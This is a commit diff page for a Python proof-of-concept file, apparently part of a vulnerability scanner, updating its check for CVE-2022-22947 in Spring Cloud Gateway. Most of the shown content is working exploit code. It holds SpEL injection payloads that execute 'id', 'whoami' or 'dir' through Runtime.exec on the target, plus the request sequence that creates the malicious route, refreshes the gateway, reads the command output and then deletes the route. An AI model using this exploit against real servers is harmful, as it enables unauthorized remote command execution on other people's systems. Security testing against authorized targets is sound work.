Skip to content

Commit 9ed3c97

Browse files
AabyssZGAabyssZG
authored
Update poc.py
1 parent 0d1747b commit 9ed3c97

File tree

1 file changed

+15
-13
lines changed

1 file changed

+15
-13
lines changed

inc/poc.py

Lines changed: 15 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -109,40 +109,42 @@ def CVE_2022_22947(url, proxies):
109109
'Content-Type': 'application/x-www-form-urlencoded'
110110
}
111111

112-
payload = '''{\r
112+
payload_windows = '''{\r
113113
"id": "hacktest",\r
114114
"filters": [{\r
115115
"name": "AddResponseHeader",\r
116-
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"}\r
117-
}],\r
118-
"uri": "http://example.com",\r
119-
"order": 0\r
120-
}'''
121-
122-
payload2 = '''{\r
123-
"id": "hacktest",\r
124-
"filters": [{\r
125-
"name": "AddResponseHeader",\r
126-
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"whoami\\"}).getInputStream()))}"}\r
116+
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"dir\\"}).getInputStream()))}"}\r
127117
}],\r
128118
"uri": "http://example.com",\r
129119
"order": 0\r
130120
}'''
121+
payload_linux = payload_windows.replace('dir', 'id')
131122

132123
try:
133124
requests.packages.urllib3.disable_warnings()
134-
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
125+
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_linux, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
135126
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
136127
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
137128
if ('uid=' in str(re3.text)) and ('gid=' in str(re3.text)) and ('groups=' in str(re3.text)):
138129
cprint(f'[+] [CVE-2022-22947] {url}', "red")
139130
f2 = open("vulout.txt", "a")
140131
f2.write("[+] [CVE-2022-22947] " + url + '\n')
141132
f2.close()
133+
else:
142134
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
143135
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
136+
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_windows, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
137+
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
138+
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
139+
if ('<DIR>' in str(re3.text)):
140+
cprint(f'[+] [CVE-2022-22947] {url}', "red")
141+
f2 = open("vulout.txt", "a")
142+
f2.write("[+] [CVE-2022-22947] " + url + '\n')
143+
f2.close()
144144
else:
145145
cprint("[-] 目标 " + url + " 验证CVE-2022-22947漏洞不存在", "yellow")
146+
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=5 ,verify=False, proxies=proxies)
147+
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=5 ,verify=False, proxies=proxies)
146148
except KeyboardInterrupt:
147149
print("Ctrl + C 手动终止了进程")
148150
sys.exit()

0 commit comments

Comments
 (0)